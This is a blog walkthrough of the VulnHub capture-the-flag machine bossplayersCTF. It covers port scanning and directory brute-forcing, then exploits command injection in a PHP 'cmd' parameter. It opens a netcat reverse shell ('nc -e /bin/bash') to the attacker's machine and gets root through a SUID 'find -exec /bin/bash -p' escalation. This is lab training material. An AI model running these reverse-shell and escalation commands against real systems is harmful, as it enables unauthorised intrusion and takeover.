The walk-through of bossplayersCTF machine from VulnHub

Name: bossplayersCTF: 1
Date release: 28 Sep 2019
Author: Cuong Nguyen
Level: Easy!
You can download it from here!

[1] Information Gathering.

I used VirtualBox to open this machine.

then i used nmap to know the machine IP by this command
nmap -sn 192.168.1.1\24 and the machine IP was 192.168.1.109.

and i started to scan ports by nmab through
nmap -sV -A -p0-65535 192.168.1.109

there are two open ports, the first is port number 22 which has SSH service, and the second is port number 80 which has http service.
so i went to http://192.168.1.109/ and i found nothing!

then i used gobuster to brute-force the directories by
gobuster dir -u http://192.168.1.109/ -w /usr/share/dirb/wordlists/common.txt

when i visited http://192.168.1.109/robots.txt i found a base64 encoded text

so i decoded it and it was

i thought i missed something! yup i forgot to view the source code of the page, so i viewed it and there was a comment and it looks like base64 encoded text

after decoding it 3 times i found a php file named workinginprogrwss.php

so i visited http://192.168.1.109/workinginprogress.php and i found

it’s look like a check list! so i think we have two missions to do, the first is testing the ping command! but how?
i started to brute-force the parameter name of the php page by burb suit and it its name was cmd

[2] Scanning for bugs.

what about typing another command?
i tried the uname -a command by giving the cmd parameter the value uname+-a and the result was

Bingo! it’s a command injection bug.

[3] Exploiting.

i checked for nc tool to make a reverse connection and get a reverse shell

and it was installed so i was listing on port 1337 by using nc by typing nc -lvp 1337 and i started the connection by typing nc -e /bin/bash 192.168.1.8 1337 and the connection was established successfully.
then i tried to get proper shell by typing
python -c ‘import pty;pty.spawn(“/bin/bash”);’ and i got it

[4] Privilege escalation.

now we have a user permissions, but we should own root permissions to get the flag, so it’s time to privilege escalation!

after some researches i understood that the privilege escalation should done by exploiting SUID executable so i typed
find / -perm -u=s -type f 2>/dev/null to show the files which have SUID bit

and i searched for privilege escalation through find command, and i found a way to get root permissions by typing find . -exec /bin/bash -p \;
then i was able to read the flag and it was a base64 encoded so i decoded it and it was Congratulations!

Hope you learned something new and you can found me on:
Facebook
Twitter

Leave a comment

Start a Blog at WordPress.com.

Up ↑

Design a site like this with WordPress.com
Get started